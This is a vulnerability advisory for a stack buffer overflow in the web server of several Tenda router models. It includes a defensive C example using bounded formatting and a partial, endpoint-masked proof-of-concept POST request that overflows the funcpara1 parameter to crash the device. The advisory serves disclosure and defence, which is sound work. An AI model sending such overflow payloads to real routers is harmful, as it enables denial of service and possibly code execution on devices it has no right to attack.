CVE-2020-13392: Tenda Vulnerability

Vendor of the products:  Tenda 

Reported by:       Joel

CVE-2020-13392    CVE_details

Affected products:  

AC9 V1.0 V15.03.05.19(6318)_CN
AC9 V3.0 V15.03.06.42_multi
AC15 V1.0 V15.03.05.19_multi_TD01
AC18 V15.03.05.19(6318_)_CN
AC6 V1.0 V15.03.05.19_multi_TD01

Overview

An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318), AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318) devices. There is a buffer overflow vulnerability in the router's web server, httpd. While processing the funcpara1 parameter of a POST request, the value is used directly in a sprintf to a local variable placed on the stack, which overwrites the return address of the function. An attacker can construct a payload to achieve arbitrary code execution.
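The unbounded copy described above, next to a bounded replacement, as an added example that is not code from the firmware or from the original advisory. Only the funcpara1 name and the sprintf into a stack buffer come from the page; the function names, the buffer size and the "%s" format string are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size: the real stack buffer size is not given in the advisory. */
#define CMD_BUF_LEN 64

/* Pattern the advisory describes (left as a comment so it never runs):
 *     char buf[CMD_BUF_LEN];
 *     sprintf(buf, "%s", funcpara1);   // no length limit on request data
 */

/* Hypothetical hardened helper: returns 0 on success, -1 if the value is
 * missing or does not fit in out together with its terminating NUL. */
int format_funcpara1(char *out, size_t out_len, const char *funcpara1)
{
    int n;

    if (out == NULL || out_len == 0 || funcpara1 == NULL)
        return -1;

    /* snprintf writes at most out_len bytes and returns the length the
     * full string would have had, which exposes truncation. */
    n = snprintf(out, out_len, "%s", funcpara1);
    if (n < 0 || (size_t)n >= out_len) {
        out[0] = '\0';   /* reject rather than act on a truncated value */
        return -1;
    }
    return 0;
}

/* Constructed input: a 600-byte run of '1', similar in shape to the PoC. */
int demo_long_value_rejected(void)
{
    char buf[CMD_BUF_LEN];
    char longval[601];

    memset(longval, '1', sizeof(longval) - 1);
    longval[sizeof(longval) - 1] = '\0';
    return format_funcpara1(buf, sizeof(buf), longval);
}

int main(void)
{
    char buf[CMD_BUF_LEN];
    printf("short value: %d\n", format_funcpara1(buf, sizeof(buf), "wan1"));
    printf("long value:  %d\n", demo_long_value_rejected());
    return 0;
}
```

A handler built this way should answer the request with an error when the helper returns -1, since a silently truncated parameter can still change what the saved configuration means.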

POC

This PoC can result in a DoS.

For the sake of the vendor's security, we provide only part of the HTTP request.

POST /goform/********** HTTP/1.1
Host: 192.168.18.131
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: text/plain
Cookie: password=ioo5gk

save=1&msgname=1&funcname=save_list_data&funcpara1=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&funcpara2=222222222222222222222222  

Details

ARM

MIPS